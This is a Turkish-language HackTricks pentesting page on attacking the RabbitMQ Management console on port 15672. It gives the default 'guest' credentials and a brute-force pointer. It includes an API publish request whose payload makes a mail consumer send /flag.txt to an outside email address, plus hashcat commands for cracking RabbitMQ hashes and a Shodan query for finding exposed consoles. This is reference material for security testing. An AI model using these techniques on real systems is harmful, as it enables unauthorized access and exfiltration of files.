# 15672 - Pentesting RabbitMQ Management {% hint style="success" %} AWS Hacking öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP Hacking öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! * **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.** * **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
{% endhint %}
**Bug bounty ipucu**: **Intigriti'ye kaydolun**, hackerlar tarafından, hackerlar için oluşturulmuş bir premium **bug bounty platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın! {% embed url="https://go.intigriti.com/hacktricks" %} ## Temel Bilgiler RabbitMQ hakkında daha fazla bilgi edinebilirsiniz [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\ Bu portta, [management plugin](https://www.rabbitmq.com/management.html) etkinse RabbitMQ Yönetim web konsolunu bulabilirsiniz.\ Ana sayfa şöyle görünmelidir: ![](<../.gitbook/assets/image (336).png>) ## Sayım Varsayılan kimlik bilgileri "_**guest**_":"_**guest**_". Eğer bunlar çalışmıyorsa [**giriş için brute-force deneyebilirsiniz**](../generic-methodologies-and-resources/brute-force.md#http-post-form). Bu modülü manuel olarak başlatmak için şunu çalıştırmanız gerekir: ``` rabbitmq-plugins enable rabbitmq_management service rabbitmq-server restart ``` Bir kez doğru bir şekilde kimlik doğruladıktan sonra, yönetici konsolunu göreceksiniz: ![](<../.gitbook/assets/image (441).png>) Ayrıca, geçerli kimlik bilgilerine sahipseniz, `http://localhost:15672/api/connections` adresindeki bilgilerin ilginç olabileceğini görebilirsiniz. Ayrıca, bu hizmetin API'sini kullanarak **bir kuyruğun içine veri yayınlamak** mümkün olduğunu unutmayın; bir istekle: ```bash POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 Host: 172.32.56.72:15672 Authorization: Basic dGVzdDp0ZXN0 Accept: */* Content-Type: application/json;charset=UTF-8 Content-Length: 267 {"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"} ``` ## Hash Kırma ```bash echo | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt hashcat -m 1420 --hex-salt hash.txt wordlist ``` ### Shodan * `port:15672 http`
**Bug bounty ipucu**: **kaydolun** **Intigriti**, **hackerlar tarafından, hackerlar için oluşturulmuş premium bir bug bounty platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın! {% embed url="https://go.intigriti.com/hacktricks" %} {% hint style="success" %} AWS Hacking öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP Hacking öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! * **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
{% endhint %}